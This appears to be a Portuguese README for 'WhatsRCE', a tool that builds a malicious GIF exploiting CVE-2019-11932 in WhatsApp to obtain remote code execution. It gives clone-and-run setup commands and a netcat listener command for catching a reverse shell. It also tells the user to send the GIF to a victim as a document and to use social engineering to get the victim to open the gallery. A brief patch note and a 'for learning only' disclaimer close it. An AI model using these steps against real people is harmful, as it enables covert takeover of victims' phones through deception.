WhatsRCE
Este é um Payload Gerado Automaticamente para o CVE-2019-11932 (Execução Remota de Código no WhatsApp)
- Instala automaticamente o GCC (comando inofensivo, você pode ver que é código aberto)
- Salva em arquivo .GIF
Como Usar ?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Como Obter Shell ?
- Você apenas envia o arquivo .GIF para o usuário vítima COMO UM DOCUMENTO, NÃO IMAGENS
- E configure o nc / netcat para a porta que você definiu na ferramenta WhatsRCE {nc -lnvp your_port}
- Você pode usar o ataque de Engenharia Social para que as vítimas sejam atraídas a executar este exploit
- diga à vítima para abrir a galeria pelo whatsapp e envie para a vítima enviar qualquer foto (não é necessário, é só entrar na galeria, sem problemas) depois disso, alguns segundos depois você receberá uma conexão shell da vítima
ou apenas assista a isso
VÍDEO DE DEMONSTRAÇÃO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
se o link acima não estiver acessível
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Como Evitar Esse Ataque?
- Atualize seu whatsapp para a versão mais recente (Corrigido na Versão 2.19.244)
- como receber qualquer arquivo, incluindo áudio, imagens e outros, de pessoas que não conhecemos
Isso é apenas para aprendizado, consequências etc. se você usar para um crime, não sou responsável!